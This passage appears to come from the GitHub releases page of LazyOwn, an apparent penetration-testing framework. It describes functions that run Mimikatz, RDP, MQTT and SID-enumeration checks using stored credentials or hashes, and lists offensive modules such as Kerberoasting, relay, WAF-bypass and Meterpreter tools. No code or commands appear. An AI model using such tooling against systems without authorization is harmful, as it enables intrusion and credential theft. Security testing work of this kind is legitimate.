and prompts the user to select a file for executing Mimikatz.
If line is "hash", it searches for a hash file, prompts for a username, and constructs the command using
the hash for authentication.
If line does not match "pass" or "hash", it displays an error message with usage instructions.

Returns:
None

rdp_check_py

Executes the RDP check tool to verify credentials or hash-based authentication on a target system.

This function performs the following actions:

Validates the target IP (rhost).
If the line argument is "pass", it searches for credential files with the pattern credentials*.txt
and prompts the user to select one to execute the RDP check.
If line is "hash", it searches for a hash file, prompts the user for a username, and constructs the command
using the hash for authentication.
If line does not match "pass" or "hash", it displays an error message with usage instructions.

Returns:
None

mqtt_check_py

Executes the MQTT check tool to verify credentials on a target system with optional SSL.

This function performs the following actions:

Validates the target IP (rhost).
If the line argument is "pass", it searches for credential files matching the pattern credentials*.txt
and prompts the user to select one to execute the MQTT check.
If line is "ssl", it performs the MQTT check with SSL enabled using the selected credentials.
If line does not match "pass" or "ssl", it displays an error message with usage instructions.

Returns:
None

lookupsid_py

Executes the LookupSID tool to perform SID enumeration on a target system.

This function performs the following actions:

Validates the target IP (rhost).
If the line argument is "basic", it searches for credential files with the pattern credentials*.txt
and prompts the user to select one to execute the SID lookup.
If line is "dc-target", it performs the SID lookup specifying domain controller and target IPs,
using the selected credentials.
If line does not match "basic" or "dc-target", it displays an error message with usage instructions.

Assets 2

0 Join discussion

Releases: grisuno/LazyOwn

release/0.2.22

What's Changed

spraykatz

caldera

ntpdate

ticketer

links

rsync

pre2k

gmsadumper

dnschef

dploot

banners

createpayload

bin2shellcode

Contributors

release/0.2.21

What's Changed

utf

dcomexec

pip_repo

apt_repo

httprobe

eyewitness_py

pup

recon

digdug

adsso_spray

creds_py

Contributors

release/0.2.20

What's Changed

getnthash_py

gets4uticket_py

aclpwn_py

addspn_py

dnstool_py

printerbug_py

krbrelayx_py

autoblody

upload_gofile

unicode_WAFbypass

sqli_mssql_test

targetedKerberoas

pyoracle2

paranoid_meterpreter

lfi

Contributors

release/0.2.19

What's Changed

Contributors

release/0.2.18

What's Changed

Contributors

release/0.2.17

release/0.2.16

What's Changed

follina

sawks

ad_ldap_enum

unzip

regeorg

rocky

Contributors

release/0.2.15

What's Changed

name_the_hash

refill_password

sudo

netview

wmiexec

extract_ports

cron

pezorsh

mimikatzpy

rdp_check_py

mqtt_check_py

lookupsid_py

scavenger